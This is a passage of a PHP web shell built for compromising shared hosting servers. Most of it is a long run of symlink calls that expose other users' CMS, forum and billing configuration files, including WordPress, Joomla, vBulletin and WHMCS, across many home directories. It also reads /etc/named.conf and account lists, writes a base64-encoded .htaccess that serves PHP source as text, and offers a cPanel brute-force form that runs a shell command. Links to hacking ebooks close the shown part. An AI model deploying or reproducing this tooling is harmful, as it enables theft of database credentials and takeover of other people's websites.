symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); } $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "<center><font color=lime size=3>[ Done ]</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; } else { mkdir($fn); chdir($fn); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '<br/>'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
2078aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
2079biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
2080'; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo "</table>"; unlink("test.txt"); echo "<center><font color=lime size=3>[ Done ]</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; } echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } ?>
2081<form method="POST" target="_blank">
2082 <strong>
2083<input name="page" type="hidden" value="find"><table>
2084 </strong><br><br><center><font size="5" style="italic" color="#FF0000">--==[ Cpanel BruteForce ]==--</font></center><br><br>
2085 <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
2086 <tr>
2087 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
2088 <center><b><font size="5" style="italic" color="#FF0000">Cpanel BruteForce</font></b></center></td></tr>
2089 <tr>
2090 <td>
2091 <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
2092 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
2093 <strong>User :</strong></td>
2094 <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
2095 </tr>
2096 <tr>
2097 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
2098 <strong>Pass :</strong></td>
2099 <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
2100 </tr>
2101 <tr>
2102 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
2103 <strong>Type :</strong></td>
2104 <td valign="top" bgcolor="#151515" colspan="5">
2105 <span class="style2"><strong>Simple : </strong> </span>
2106 <strong>
2107 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
2108 <font class="style2"><strong>/etc/passwd : </strong> </font>
2109 <strong>
2110 <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
2111 </strong>
2112 </span>
2113 </td>
2114 </tr>
2115 <tr>
2116 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
2117 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
2118 </strong>
2119 </td>
2120 <tr>
2121</form>
2122<tr>
2123 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
2124 </tr>
2125<form method="POST" target="_blank">
2126 <strong>
2127<input name="mendapatkan" type="hidden" value="passwd">
2128 </strong>
2129 <tr>
2130 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
2131 <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
2132 </strong>
2133 </td>
2134 </tr>
2135 <tr>
2136 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
2137 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
2138 </strong>
2139 </td>
2140 <tr>
2141</form>
2142<tr>
2143 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
2144 </tr>
2145<form method="POST" target="_blank">
2146 <strong>
2147<input name="pass" type="hidden" value="password">
2148 </strong>
2149 <tr>
2150 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
2151 <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
2152 </strong>
2153 </td>
2154 </tr>
2155 <tr>
2156 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
2157 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
2158 </strong>
2159 </td>
2160 <tr>
2161</form>
2162<tr>
2163 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
2164 Security</strong></td>
2165 </tr>
2166 <tr>
2167 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
2168 <td valign="top" bgcolor="#151515" colspan="5">
2169 <strong>
2170<?php $safe_mode = ini_get('safe_mode'); if($safe_mode=='1') { echo 'ON'; }else{ echo 'OFF'; } ?>
2171 </strong>
2172 </td>
2173 </tr>
2174 <tr>
2175 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
2176 <td valign="top" bgcolor="#151515" colspan="5">
2177 <strong>
2178<form method="POST" target="_blank">
2179 <strong>
2180<input name="matikan" type="hidden" value="sekatan">
2181 </strong>
2182
2183<?php if(''==($func=@ini_get('disable_functions'))) { echo "<font color=#FF0000>No Security for Function</font></b>"; }else{ echo '<script>alert("Please see below and press >Please Click Here First!<");</script>'; echo "<font color=red>$func</font></b>"; echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>'; echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
2184 </strong>
2185 </td></tr>'; } ?></strong></td></tr></table></table></table>
2186<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'tutor')) { ?>
2187 <form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">
2188 <center><br><br><b>--=[ Tutorial & Ebook hacking ]=--</b><br>
2189 <form method="post" action="">
2190<table class="tabnet" border="1" >
2191<tr>
2192 <td align="center">English</td><td align="center">Indonesian</td>
2193 </tr>
2194 <tr>
2195 <td><form method="post" action="">
2196 E-book Hacking :
2197 <select class="inputzbut" name="pilih" id="pilih">
2198 <option value=""selected>-----------------[ Select ]-----------------</option>
2199 <option value="tutorial24" > Hacking Exposed-5 </option>
2200 <option value="tutorial25"> Internet Denial Of Service </option>
2201 <option value="tutorial26">Computer Viruses For Dummies</option>
2202 <option value="tutorial27">Hack Attacks Testing</option>
2203 <option value="tutorial28">Secrets Of A Super Hacker</option>
2204 <option value="tutorial29">Stealing The Network</option>
2205 <option value="tutorial30">Hacker's HandBook</option>
2206 </select>
2207 <input type="submit" name="submit" class="inputzbut" value="Download">
2208 </td></form>
2209<td><form method="post" action="">
2210Tutorial :
2211 <select class="inputzbut" name="pilih" id="pilih">
2212 <option value=""selected>-----------------[ Select ]-----------------</option>
2213 <option value="tutorial2">Search Engine Hacking</option>
2214 <option value="tutorial3">SQL Injection dengan hackbar</option>
2215 <option value="tutorial1" >Bypass Union</option>
2216 </select>
2217 <input type="submit" name="submit" class="inputzbut" value="Download">
2218</form></td>
2219</tr>
2220<tr>
2221<td>
2222<form method="post" action="">
2223E-Book from Syn|gress :
2224 <select class="inputzbut" name="pilih" id="pilih">
2225 <option value=""selected>-----------------[ Select ]-----------------</option>
2226 <option value="cryptography_for_defeloper">Cryptography for Developer</option>
2227 <option value="tutorial31">Mobile Malware Attack and Defense</option>
2228 <option value="forensic">CD and DVD Forensic</option>
2229 <option value="ddd">Open Sourch Security Tools</option>
2230 <option value="metasploit">Metaslpoit Toolkit</option>
2231 <option value="stealing_network">Stealing the Network</option>
2232 <option value="security_polices">Creating Security Polices</option>
2233 </select>
2234 <input type="submit" name="submit" class="inputzbut" value="Download">
2235</form></td>
2236<td>
2237<form method="post" action="">
2238X-CODE MAGAZINE :
2239 <select class="inputzbut" name="pilih" id="pilih">
2240 <option value=""selected>-----------------[ Select ]-----------------</option>
2241 <option value="tutorial4">X-CODE MAGAZINE 1</option>
2242 <option value="tutorial5">X-CODE MAGAZINE 2</option>
2243 <option value="tutorial6">X-CODE MAGAZINE 3</option>
2244 <option value="tutorial7">X-CODE MAGAZINE 4</option>
2245 <option value="tutorial8">X-CODE MAGAZINE 5</option>
2246 <option value="tutorial9">X-CODE MAGAZINE 6</option>
2247 <option value="tutorial10">X-CODE MAGAZINE 7</option>
2248 <option value="tutorial11">X-CODE MAGAZINE 8</option>
2249 <option value="tutorial12">X-CODE MAGAZINE 9</option>
2250 <option value="tutorial13">X-CODE MAGAZINE 10</option>
2251 <option value="tutorial14">X-CODE MAGAZINE 11</option>
2252 <option value="tutorial15">X-CODE MAGAZINE 12</option>
2253 <option value="tutorial16">X-CODE MAGAZINE 13</option>
2254 <option value="tutorial17">X-CODE MAGAZINE 14</option>
2255 <option value="tutorial18">X-CODE MAGAZINE 15</option>
2256 <option value="tutorial19">X-CODE MAGAZINE 16</option>
2257 <option value="tutorial20">X-CODE MAGAZINE 17</option>
2258 <option value="tutorial21">X-CODE MAGAZINE 18</option>
2259 <option value="tutorial22">X-CODE MAGAZINE 19</option>
2260 <option value="tutorial23">X-CODE MAGAZINE 20</option>
2261 <option value="tutorial024">X-CODE MAGAZINE 21</option>
2262 </select>
2263 <input type="submit" name="submit" class="inputzbut" value="Download" ></a>
2264</form></td></tr></table><br><br>
2265<?php $submit = $_POST ['submit']; if(isset($submit)) { $pilih = $_POST['pilih']; if ( $pilih == 'tutorial1') { ?>
2266 <script>
2267 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf';
2268 </script>
2269 <?php } elseif ( $pilih == 'tutorial2') { ?>
2270 <script>
2271 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf';
2272 </script>
2273 <?php } elseif ( $pilih == 'tutorial3') { ?>
2274 <script>
2275 document.location = 'hxxp://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf';
2276 </script>
2277 <?php } elseif ( $pilih == 'tutorial4') { ?>
2278 <script>
2279 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_1.zip';
2280 </script>
2281 <?php } elseif ( $pilih == 'tutorial5') { ?>
2282 <script>
2283 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_2.zip';
2284 </script>
2285 <?php } elseif ( $pilih == 'tutorial6') { ?>
2286 <script>
2287 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_3.zip';
2288 </script>
2289 <?php } elseif ( $pilih == 'tutorial7') { ?>
2290 <script>
2291 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_4.zip';
2292 </script>
2293 <?php } elseif ( $pilih == 'tutorial8') { ?>
2294 <script>
2295 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_5.rar';
2296 </script>
2297 <?php } elseif ( $pilih == 'tutorial9') { ?>
2298 <script>
2299 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_6.rar';
2300 </script>
2301 <?php } elseif ( $pilih == 'tutorial10') { ?>
2302 <script>
2303 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_7.rar';
2304 </script>
2305 <?php } elseif ( $pilih == 'tutorial11') { ?>
2306 <script>
2307 document.location = 'hxxp://xcode.or.id/files/xcode_magazine_8.rar';
2308 </script>
2309 <?php } elseif ( $pilih == 'tutorial12') { ?>
2310 <script>
2311 document.location = 'hxxp://xcode.or.id/files/xcode9.zip';
2312 </script>
2313 <?php } elseif ( $pilih == 'tutorial13') { ?>
2314 <script>
2315 document.location = 'hxxp://xcode.or.id/files/xcode10.zip';
2316 </script>
2317 <?php } elseif ( $pilih == 'tutorial14') { ?>
2318 <script>
2319 document.location = 'hxxp://xcode.or.id/files/xcode11.zip';
2320 </script>
2321 <?php } elseif ( $pilih == 'tutorial15') { ?>
2322 <script>
2323 document.location = 'hxxp://xcode.or.id/files/Xcode12.zip';
2324 </script>
2325 <?php } elseif ( $pilih == 'tutorial16') { ?>
2326 <script>
2327 document.location = 'hxxp://xcode.or.id/files/Xcode13.zip';
2328 </script>
2329 <?php } elseif ( $pilih == 'tutorial17') { ?>
2330 <script>
2331 document.location = 'hxxp://xcode.or.id/files/Xcode14.zip';
2332 </script>
2333 <?php } elseif ( $pilih == 'tutorial18') { ?>
2334 <script>
2335 document.location = 'hxxp://xcode.or.id/Xcode15.zip';
2336 </script>
2337 <?php } elseif ( $pilih == 'tutorial19') { ?>
2338 <script>
2339 document.location = 'hxxp://xcode.or.id/xcode_magazine_16.zip';
2340 </script>
2341 <?php } elseif ( $pilih == 'tutorial20') { ?>
2342 <script>
2343 document.location = 'hxxp://xcode.or.id/xcode_magazine_17.zip';
2344 </script>
2345 <?php } elseif ( $pilih == 'tutorial21') { ?>
2346 <script>
2347 document.location = 'hxxp://xcode.or.id/xcode_magazine_18.zip';
2348 </script>
2349 <?php } elseif ( $pilih == 'tutorial22') { ?>
2350 <script>
2351 document.location = 'hxxp://xcode.or.id/xcode_magazine_19.zip';
2352 </script>
2353 <?php } elseif ( $pilih == 'tutorial23') { ?>
2354 <script>
2355 document.location = 'hxxp://xcode.or.id/xcode_magazine_20.zip';
2356 </script>
2357 <?php } elseif ( $pilih == 'tutorial024') { ?>
2358 <script>
2359 document.location = 'hxxp://xcode.or.id/xcode_magazine_21.zip';
2360 </script>
2361 <?php } elseif ( $pilih == 'tutorial24') { ?>
2362 <script>
2363 document.location = 'hxxp://www.insecure.in/ebooks/hacking_exposed_5.rar';
2364 </script>
2365 <?php } elseif ( $pilih == 'tutorial25') { ?>
2366 <script>
2367 document.location = 'hxxp://www.insecure.in/ebooks/internet_denial_of_service.rar';
2368 </script>
2369 <?php } elseif ( $pilih == 'tutorial26') { ?>
2370 <script>
2371 document.location = 'hxxp://www.insecure.in/ebooks/computer_viruses_for_dummies.rar';
2372 </script>
2373 <?php } elseif ( $pilih == 'tutorial27') { ?>
2374 <script>
2375 document.location = 'hxxp://www.insecure.in/ebooks/hack_attacks_testing.rar';
2376 </script>
2377 <?php } elseif ( $pilih == 'tutorial28') { ?>
2378 <script>
2379 document.location = 'hxxp://www.insecure.in/ebooks/secrets_of_super_hacker.rar';
2380 </script>
2381 <?php } elseif ( $pilih == 'tutorial29') { ?>
2382 <script>
2383 document.location = 'hxxp://www.insecure.in/ebooks/stealing_network_how_to_own_shadow.rar';
2384 </script>
2385 <?php } elseif ( $pilih == 'tutorial30') { ?>
2386 <script>
2387 document.location = 'hxxp://www.insecure.in/ebooks/webapp_hackers_handbook.rar';
2388 </script>
2389 <?php } elseif ( $pilih == 'ddd') { ?>
2390 <script>
2391 document.location = 'hxxp://199.91.153.95/t8dni7k639hg/3o321lcwwk8u5bh/Open_Source_Security_Tools.pdf';
2392 </script>
2393 <?php } elseif ( $pilih == 'tutorial31') { ?>
2394 <script>
2395 document.location = 'hxxp://205.196.121.149/sg22hm8qjbhg/afsa7ibbk4ny2kd/Mobile_Malware_Attacks_and_Defense.pdf';
2396 </script>
2397 <?php } elseif ( $pilih == 'cryptography_for_defeloper') { ?>
2398 <script>
2399 document.location = 'hxxp://205.196.121.248/0sod33qw66ug/wypyz555sc9bn7h/Cryptography_for_Developers.pdf';
2400 </script>
2401 <?php } elseif ( $pilih == 'forensic') { ?>
2402 <script>
2403 document.location = 'hxxp://205.196.120.85/uisebgmioyjg/6l70l00ba9yoksq/CD_and_DVD_Forensics.pdf';
2404 </script>
2405 <?php } elseif ( $pilih == 'metasploit') { ?>
2406 <script>
2407 document.location = 'hxxp://199.91.153.192/3t115p2f6gvg/zvrrddmq6icqtd2/Metasploit_Toolkit.pdf';
2408 </script>
2409 <?php }elseif ( $pilih == 'stealing_network') { ?>
2410 <script>
2411 document.location = 'hxxp://205.196.123.138/wbsxltb8rbtg/5vm8a1d23i9zje3/Stealing_the_Network_-_How_to_Own_the_Box.pdf';
2412 </script>
2413 <?php }elseif ( $pilih == 'security_polices') { ?>
2414 <script>
